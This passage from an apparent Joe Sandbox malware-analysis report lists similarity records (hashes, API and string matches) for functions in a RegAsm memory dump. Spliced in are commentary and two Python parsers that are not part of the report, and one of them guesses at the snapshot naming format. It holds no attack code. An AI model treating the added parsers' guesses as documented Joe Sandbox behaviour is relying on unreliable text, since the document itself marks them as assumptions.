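            current.api_calls.append(line)
    return records


def extract_hostnames(text: str) -> dict[str, str]:
    """Map each host-name-looking string to the Instruction ID of the function that holds it."""
    found: dict[str, str] = {}
    for rec in parse_records(text):
        for host in rec.hostnames():
            found[host] = rec.fields.get("Instruction ID", "")
    return found


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_ids, rec.api_calls, rec.hostnames(), rec.hashes)
    print(extract_hostnames(SAMPLE))
```

Run it over the whole "Joe Sandbox IDA Plugin" portion of a report saved as text and the hostname map gives the strings worth checking against the network section, while the Instruction Fuzzy Hash and Opcode Fuzzy Hash fields stay available per record for comparing functions across samples. Because `$` is the report's own separator, any string that legitimately contains `$` is split at that point; the original memory dump, not this rendering, is the place to recover it.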
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: |1[3O=]?O9H;(EFG
                          • API String ID: 0-2327365969
                          • Opcode ID: 498f6e79ce40924af8d936b1f52076ceafa217d31f6103c9ab7f940ef28ac6df
                          • Instruction ID: 2a0eead5d1c0089b4ab363994fe3972e8cdfd85871b92c54397a6d948d4edf12
                          • Opcode Fuzzy Hash: 498f6e79ce40924af8d936b1f52076ceafa217d31f6103c9ab7f940ef28ac6df
                          • Instruction Fuzzy Hash: E0E11275E002288BDB14CFA4E8917EEBBB1FF45304F15416DD946AB381EB789E06CB80
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: lmno
                          • API String ID: 0-919139636
                          • Opcode ID: 50c40eb443a0e3030ea8cf5a1a4e0f710fbcfa788eae5434240e0c8aab7c8de9
                          • Instruction ID: 1a3b389284ba562a87a77495ad854079d758d6bb5ca4be60c9ad11856d53808d
                          • Opcode Fuzzy Hash: 50c40eb443a0e3030ea8cf5a1a4e0f710fbcfa788eae5434240e0c8aab7c8de9
                          • Instruction Fuzzy Hash: 38B15976A042205BD7209F24D85263BB7F1EFD2324F59852EE4C597382E77CEA01879A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: dg
                          • API String ID: 0-2476624039
                          • Opcode ID: 70ec5b397a7f9d3380583bba9cdb7db1c77063673f7266ca13b8b3f9d3bff3c1
                          • Instruction ID: a777d1112300ed0328085d988200fc2b3161b415096455110393fd80377dd20e
                          • Opcode Fuzzy Hash: 70ec5b397a7f9d3380583bba9cdb7db1c77063673f7266ca13b8b3f9d3bff3c1
                          • Instruction Fuzzy Hash: A1B1DF79A183018BC724CF29C8513ABB7F1EF95314F48892DE8D99B390E738D945C79A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,
                          • API String ID: 0-3772416878
                          • Opcode ID: 42698df11754288f7c7e22d86eca644924014b76b5d582c7a606c14b27339af4
                          • Instruction ID: 154771c752a932779d5afa772b51c111bd756c018d561075520692a7b9a2d090
                          • Opcode Fuzzy Hash: 42698df11754288f7c7e22d86eca644924014b76b5d582c7a606c14b27339af4
                          • Instruction Fuzzy Hash: C8B149701083819FC321DF58C98061BFBE0AFA9704F444A6DE5DA97782D635E918CB6B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: LJ
                          • API String ID: 0-1839849906
                          • Opcode ID: 32e2b2a4043bf6c096733809b1c40c94b04732bdd8f6a7cc70eba95ff2f9126b
                          • Instruction ID: 7d08a5681504b9b7e6a48ed61d136dcf9633ff4ddde9a0c90a6c0ffdbab556b4
                          • Opcode Fuzzy Hash: 32e2b2a4043bf6c096733809b1c40c94b04732bdd8f6a7cc70eba95ff2f9126b
                          • Instruction Fuzzy Hash: D5D1E9B4151B40DBE3748F26E984787BBF1BB42754F608E1CD1EA2BA85C778A005CF99
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8-
                          • API String ID: 0-3812798818
                          • Opcode ID: 20fc81fce02fe6b391ff2be7b83f0511e06d7cf125620e5bac4aa39a2fb39c10
                          • Instruction ID: a25670a122ddcdfd22edf8418b3041ba70b3d4310d6e9ffa78eb72c008a34486
                          • Opcode Fuzzy Hash: 20fc81fce02fe6b391ff2be7b83f0511e06d7cf125620e5bac4aa39a2fb39c10
                          • Instruction Fuzzy Hash: B06125729443218BC3259F24C8902ABB7F2FFE6750F1A965DE8D52B3A4E3358D41C785
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: "
                          • API String ID: 0-123907689
                          • Opcode ID: d605f69cb6a61cba6e277e74b20d9a248e2b5eec550f027b6d34fa71407e500c
                          • Instruction ID: a83cd635106bba80700be3c932c2028a4828255dda0c33b642da19134739f146
                          • Opcode Fuzzy Hash: d605f69cb6a61cba6e277e74b20d9a248e2b5eec550f027b6d34fa71407e500c
                          • Instruction Fuzzy Hash: 8871E9327047344BC7249D6DA88022B77D6EBC5730F99872AE8B88B3D5D7788C4587CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: %*+(
                          • API String ID: 2994545307-3233224373
                          • Opcode ID: 7228b157b8eb77ce6c7dd744172b13d4fd0337b8f37e9e8f95ac9db7c94dd113
                          • Instruction ID: e759ce7f0c2a445e802c7890bbd8bf261f8ae77e8e9d52c3cb1d641808a64f00
                          • Opcode Fuzzy Hash: 7228b157b8eb77ce6c7dd744172b13d4fd0337b8f37e9e8f95ac9db7c94dd113
                          • Instruction Fuzzy Hash: A181DF756042019FE718DF29C891A2BB7E2FFD9344F19852EE5848B361DB39EC41CB4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: K7
                          • API String ID: 2994545307-4265185514
                          • Opcode ID: 854bedc942d704704795661a3ad1bfdb0958c756f2dc05a7bcc0a66d4eefe7f2
                          • Instruction ID: fe9f68dd6caef55a4fd82ba992068611efb3462d70c4cbc8eb857c667fd0fb75
                          • Opcode Fuzzy Hash: 854bedc942d704704795661a3ad1bfdb0958c756f2dc05a7bcc0a66d4eefe7f2
                          • Instruction Fuzzy Hash: 6E5105743053049FD7248F29C8917BFF7A2EB9A324F29D62DD4860B292C33958458BDE
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8-
                          • API String ID: 0-3812798818
                          • Opcode ID: 0ca0e89c1ad262b6a6c440f5f203b2743f750613855566febdcb123336d30ef8
                          • Instruction ID: e011ceead91074b7cc013e3f585e65df6e98f08ec6e89e21a7cc2fe669adb6fa
                          • Opcode Fuzzy Hash: 0ca0e89c1ad262b6a6c440f5f203b2743f750613855566febdcb123336d30ef8
                          • Instruction Fuzzy Hash: 3D6100715483218BC720DF28C8D06ABB7F2FF96750F19965DE8D15B368E7388841C786
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: _
                          • API String ID: 0-701932520
                          • Opcode ID: ea82e861296f54f02b876c034cb7da8e08a6f47831a7466b4fdab98e1bae1d94
                          • Instruction ID: 5e629cd5a4b8a39bce27e5c3485168bef556bfb607e8c52a14ceb3c4a70aec2a
                          • Opcode Fuzzy Hash: ea82e861296f54f02b876c034cb7da8e08a6f47831a7466b4fdab98e1bae1d94
                          • Instruction Fuzzy Hash: 7E71F71621564109D72CDF748893337BAD6DF84709F2891BFC956CFA9BE93CC2028B89
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: gfff
                          • API String ID: 2994545307-1553575800
                          • Opcode ID: d4706cb9d9b86324b9686a1075bb5e92e46f9864c8ac80011f8ec985681e92ed
                          • Instruction ID: c7ac6c206ebcf67d1ef8b55e3b2ef8f9a91c8942a348e493453017bf745ecb34
                          • Opcode Fuzzy Hash: d4706cb9d9b86324b9686a1075bb5e92e46f9864c8ac80011f8ec985681e92ed
                          • Instruction Fuzzy Hash: 606147B56052504BD319CB28C8517BB77E2EBC5328F08863EE096CB3D5EB78C546878A
                          Strings
                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0041FE22
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          • API String ID: 0-442858466
                          • Opcode ID: 06249b3145be53e11267c2cf2d9ea3bd6f0f09238b8304bbbbe1bbfad56d3055
                          • Instruction ID: 1a389e364e849dd5f6a7dd31dd641fce1bd1149b36441138696bb40b5ef6ef00
                          • Opcode Fuzzy Hash: 06249b3145be53e11267c2cf2d9ea3bd6f0f09238b8304bbbbe1bbfad56d3055
                          • Instruction Fuzzy Hash: DE61F83764968187D7288E3C5C512EABA935FD3334B3D837BE4B1873E1C669894B4349
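Each block above is one similarity record for a function recovered from the RegAsm memory dump: the Opcode ID and Instruction ID, the two fuzzy hashes, and the API name / string pair the Joe Sandbox IDA plugin matched (the record just above is the one whose function references the 36-character alphabet at 0041FE22). As an added example, not part of this report or of Joe Sandbox's own tooling, the Python below parses records in exactly this layout and pivots on them: which API names are tagged, which functions share an API String ID while carrying different Opcode IDs, and which strings are referenced from which address. The sample text is excerpted from records on this page, trimmed to the fields the parser reads; the decoding of the snapshot file name into process index, dump index, base address and image name is an assumption drawn from the names on the page, not a documented Joe Sandbox format.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field

# Constructed sample: four records excerpted from this page's listing for the
# RegAsm dump (process 5, base 0x400000), trimmed to the fields parsed below.
SAMPLE = """\
Strings
• 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0041FE22
Memory Dump Source
• Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
Similarity
• API ID:
• String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
• API String ID: 0-442858466
• Opcode ID: 06249b3145be53e11267c2cf2d9ea3bd6f0f09238b8304bbbbe1bbfad56d3055
Strings
Memory Dump Source
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
• API ID: InitializeThunk
• String ID: K7
• API String ID: 2994545307-4265185514
• Opcode ID: 854bedc942d704704795661a3ad1bfdb0958c756f2dc05a7bcc0a66d4eefe7f2
Strings
Memory Dump Source
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
• API ID: InitializeThunk
• String ID: K7
• API String ID: 2994545307-4265185514
• Opcode ID: 867195d74dc1159dbf9a996b73e7eb7693fbb1a1e37db4605eb6ee8acb1458c8
Memory Dump Source
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
• API ID:
• String ID:
• API String ID:
• Opcode ID: ce35907d57f9f54abcfd436ffff034d089d242f90efa385d37cc7449ac22ee44
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")          # "• Key: value" (value may be empty)
XREF_RE = re.compile(r"^•\s*(.*), xrefs: ([0-9A-Fa-f]+)$")  # "• <string>, xrefs: <addr>"
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_(.+)\.jbxd$")


@dataclass
class FunctionRecord:
    xrefs: list = field(default_factory=list)   # (string, referencing address) pairs
    fields: dict = field(default_factory=dict)  # "API ID", "String ID", "Opcode ID", ...


def parse_records(text):
    """One FunctionRecord per 'Memory Dump Source' block.

    A 'Strings' section precedes the record it belongs to (and may be empty), so
    its xrefs are buffered until the next 'Memory Dump Source' line opens that record."""
    records, pending, current, in_strings = [], [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Strings":
            in_strings = True
        elif line == "Memory Dump Source":
            current = FunctionRecord(xrefs=pending)
            records.append(current)
            pending, in_strings = [], False
        elif in_strings:
            m = XREF_RE.match(line)
            if m:
                pending.append((m.group(1), m.group(2)))
        elif current is not None:
            m = FIELD_RE.match(line)
            if m:
                current.fields[m.group(1).strip()] = m.group(2).strip()
    return records


def api_usage(records):
    """How many functions the plugin tagged with each API name (untagged ones skipped)."""
    return Counter(r.fields["API ID"] for r in records if r.fields.get("API ID"))


def shared_similarity_ids(records):
    """API String IDs carried by more than one function, mapped to their Opcode IDs.

    Same API String ID means the same API/string pair was matched; differing Opcode
    IDs show the functions are still distinct code, so the pair alone is not a
    function identity and must be combined with the opcode or instruction hash."""
    groups = defaultdict(list)
    for r in records:
        key = r.fields.get("API String ID")
        if key:
            groups[key].append(r.fields.get("Opcode ID", ""))
    return {k: v for k, v in groups.items() if len(v) > 1}


def strings_by_address(records):
    """Every xref'd string in the listing keyed by the address that references it."""
    return {addr: s for r in records for s, addr in r.xrefs}


def parse_snapshot_name(name):
    """Decode hcaresult_<proc>_<dump>_<base>_<image>.jbxd.

    Assumption: the fields are process index, dump index, hex base address and
    image name; 5 / 2 / 0x400000 / RegAsm agree with the Source File line above."""
    m = SNAPSHOT_RE.match(name)
    if not m:
        raise ValueError(f"unexpected snapshot name: {name}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3), 16), m.group(4)
```

Running the helpers over a full report export rather than this excerpt gives a quick triage view: functions tagged with an API name are the ones worth opening first, and repeated API String IDs across different Opcode IDs (the two K7 / InitializeThunk records here) warn that the string pair by itself is not a usable signature.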
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: K7
                          • API String ID: 2994545307-4265185514
                          • Opcode ID: 867195d74dc1159dbf9a996b73e7eb7693fbb1a1e37db4605eb6ee8acb1458c8
                          • Instruction ID: d32e7d3792677d9385e059763a7ef5fa823f6309972ca4856a10a181381cda46
                          • Opcode Fuzzy Hash: 867195d74dc1159dbf9a996b73e7eb7693fbb1a1e37db4605eb6ee8acb1458c8
                          • Instruction Fuzzy Hash: 8F513970305300AFD765CF29C8927ABB7A2EF95310F6DC52ED48607292C7395C46CB9A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: >2%8
                          • API String ID: 0-3601729801
                          • Opcode ID: 2ee780600435e65269fe4e80ce9b83c80dd633bf5fc20d5ece1fc62b2f340194
                          • Instruction ID: 25f1567813761ad97d2965320a888a75774facb01b46e5cde3064720964745c5
                          • Opcode Fuzzy Hash: 2ee780600435e65269fe4e80ce9b83c80dd633bf5fc20d5ece1fc62b2f340194
                          • Instruction Fuzzy Hash: A54127E46047918AE3228B3994D07B3FFE0AF67305F58158EE1EB47353C37928498759
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: 5|iL
                          • API String ID: 2994545307-1880071150
                          • Opcode ID: f859b1e3a86568bcd84bd1bc52340373328660a03d92756c22bb718cb172e1e6
                          • Instruction ID: be18f974b8193378ca69b65b54ee200706267250bbd1d07609027685d17a46dd
                          • Opcode Fuzzy Hash: f859b1e3a86568bcd84bd1bc52340373328660a03d92756c22bb718cb172e1e6
                          • Instruction Fuzzy Hash: 05412471315301ABF714DF29EC82B3AB7A6FB86344F18842DE580D72A0E678A850874D
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: p8
                          • API String ID: 0-2130562967
                          • Opcode ID: 1c13aef119dfada8b7544f08803ac15a44fcd6b6b6c54346d030ead43caf1b11
                          • Instruction ID: 396cf621a9295f03ee0f8f194c331b0e18ebba4edf0cc430ad609cf39bee8afd
                          • Opcode Fuzzy Hash: 1c13aef119dfada8b7544f08803ac15a44fcd6b6b6c54346d030ead43caf1b11
                          • Instruction Fuzzy Hash: 8131BCB6E107288B8B18CFE9E8904AEBFB1FB15314F25522DD9617B394D7781900CF85
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ce35907d57f9f54abcfd436ffff034d089d242f90efa385d37cc7449ac22ee44
                          • Instruction ID: feefcd8f1536a5f1d2cc18da86cc08fb87ddb41a3bc1dae01e43e37ddbe70314
                          • Opcode Fuzzy Hash: ce35907d57f9f54abcfd436ffff034d089d242f90efa385d37cc7449ac22ee44
                          • Instruction Fuzzy Hash: 82529E31A087118BC725DF18D98067AB3E1FFC4304F25893ED9D6A7385D738A956CB8A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08eae610eeda58969c5ed71f99fa41f332953503138e122d5d26e54d026c5d25
                          • Instruction ID: 1efd3675d8875478b850b54804e16fef475d3d5ae18289fe68986804587af791
                          • Opcode Fuzzy Hash: 08eae610eeda58969c5ed71f99fa41f332953503138e122d5d26e54d026c5d25
                          • Instruction Fuzzy Hash: 7052E2315083458FCB15CF24C1906AABBE1FF89304F198A7EE8996B381D779E949CB85
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0db90b9942ec8ecdca5fb553ea7776a758bf863260735089a4a8bb25b1e726cf
                          • Instruction ID: 67d713257c309c85736cec1845cc1d9a4873a4ee673940014eb2de2a2a8491e0
                          • Opcode Fuzzy Hash: 0db90b9942ec8ecdca5fb553ea7776a758bf863260735089a4a8bb25b1e726cf
                          • Instruction Fuzzy Hash: F3528F70D08B849EEB35CB24C4847A7BBE1AB51314F14893EC5EB16BC2C27DB885C75A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14a546b8130f87ce6225e4779f8c82e36b45d4d1007f6213355f0bce4df59134
                          • Instruction ID: 5ec806bfc4fdcaa9b19c04f0a6f3cac88961a43f3209f60bc56503115d8e12a2
                          • Opcode Fuzzy Hash: 14a546b8130f87ce6225e4779f8c82e36b45d4d1007f6213355f0bce4df59134
                          • Instruction Fuzzy Hash: 494254B0614B108FC338CF29C68052ABBF5BB45711B608A2ED69797F91D73AF945CB18
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a57bc0d18e038412e411abbd3359c0c8b5e5da86444efddb2a407b477d55d57
                          • Instruction ID: 734486481cff5e4e0e5087a3076c9d25f489d67d58a94ac154b3a431baae40d3
                          • Opcode Fuzzy Hash: 2a57bc0d18e038412e411abbd3359c0c8b5e5da86444efddb2a407b477d55d57
                          • Instruction Fuzzy Hash: A2328021508BC18ED3268A3C8845356BFD16B66328F1C879DD4E98F7D3C36AD14BC7A6
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8fd375bf3516db857a5b8f4e9d18a7a4dde794f11d07c13cb422ee88cba72c16
                          • Instruction ID: b783bebdde46e3b8b7be59880dd73a7ac46d541786670248ca7f8f7eedf55a95
                          • Opcode Fuzzy Hash: 8fd375bf3516db857a5b8f4e9d18a7a4dde794f11d07c13cb422ee88cba72c16
                          • Instruction Fuzzy Hash: EBE17D712087418FD720CF29C880A6BFBE1EF99304F44882DF4D697792E679E954CB96
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1aa9ee82479606d79c78ff6beaa22b27bc750450671219b2b8445c66eccead89
                          • Instruction ID: 5ab32b3bfb9b1d3f5e842bd634ed02594806a4d9f59ef2a3d1d32b65e045bc5c
                          • Opcode Fuzzy Hash: 1aa9ee82479606d79c78ff6beaa22b27bc750450671219b2b8445c66eccead89
                          • Instruction Fuzzy Hash: 448123B5904211DBC7209F18DC826B773B0FF96358F08452EF9864B392FB38A950C79A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61226a05d3d946f32a87627e2cbad7c3a2ce9d5b46345b89293357b1a80158a5
                          • Instruction ID: dce13f4c60ded9296c87edc5b0b8b9a170e3a9eb240bcaa2e0a89ebf88acd714
                          • Opcode Fuzzy Hash: 61226a05d3d946f32a87627e2cbad7c3a2ce9d5b46345b89293357b1a80158a5
                          • Instruction Fuzzy Hash: BCB13A32B05B528BD728CA28D4E1277B7D2EFA5320769862FC4A70B7D1C738B801D759
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21eef490a741124f975e333f9f41dbbf26a33a26c0eb5ce82e57c9491807e06d
                          • Instruction ID: 17bfb6383042b0ad677a874368420975a50fd98476fa640b97db45d1772a28ea
                          • Opcode Fuzzy Hash: 21eef490a741124f975e333f9f41dbbf26a33a26c0eb5ce82e57c9491807e06d
                          • Instruction Fuzzy Hash: 08C15CB2A487418FC360CF28DC867ABB7E1FF85318F09492DD1DAD6242E778A155CB46
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4f95e4135a5855b4899df90ff2c4b2102b2866d8fdf2f026081c20a565ed87b
                          • Instruction ID: c4dba0f52655684e45db77cbfbc82a2fd5864c62d6828ffe9689b2d09c5d986a
                          • Opcode Fuzzy Hash: d4f95e4135a5855b4899df90ff2c4b2102b2866d8fdf2f026081c20a565ed87b
                          • Instruction Fuzzy Hash: 9C916B72A0826547C7206D29CD801AB7793ABC1310F69CA3AD8E5BB3DDEF3CD90646C5
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 90def7e7967b5ac5e8f1ce832c6c7e9234fa4de33fc9e0ca97dbf0b13ef28955
                          • Instruction ID: ae5b627df059e6d32b5427388680294cef765974f1d1fef8568235bb8ce60915
                          • Opcode Fuzzy Hash: 90def7e7967b5ac5e8f1ce832c6c7e9234fa4de33fc9e0ca97dbf0b13ef28955
                          • Instruction Fuzzy Hash: C5B10F719087C18FCB12867CC8413ADFFB1AB5B314F1C829EE5A59B386C63E5806C766
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f9eaa333ef3614d223f596bd0b06860529e28dad87bedf57836b6370be27ef0
                          • Instruction ID: 700c4c60dce8ef70e102e0c470773ea2ad0dfaf4d7bf26b266cb7fbe973ff51a
                          • Opcode Fuzzy Hash: 6f9eaa333ef3614d223f596bd0b06860529e28dad87bedf57836b6370be27ef0
                          • Instruction Fuzzy Hash: 05A1CCBA600B01CFC7248F25DC95B67B7F6FF89301F15892DD4AA83AA0DB34E9058B44
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b87b11583e0f5d28605c66e7a394b14b2a4f26a5d78a3762c92f41778c330a8
                          • Instruction ID: 0ae4913aec9e295600022936d99bfbceb1447a60fd068f6f340e7002d317dfad
                          • Opcode Fuzzy Hash: 5b87b11583e0f5d28605c66e7a394b14b2a4f26a5d78a3762c92f41778c330a8
                          • Instruction Fuzzy Hash: 0091F27420C3818FC315CF29C48062EBBE2AFCA314F18D56EE5E597392D639D846CB56
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
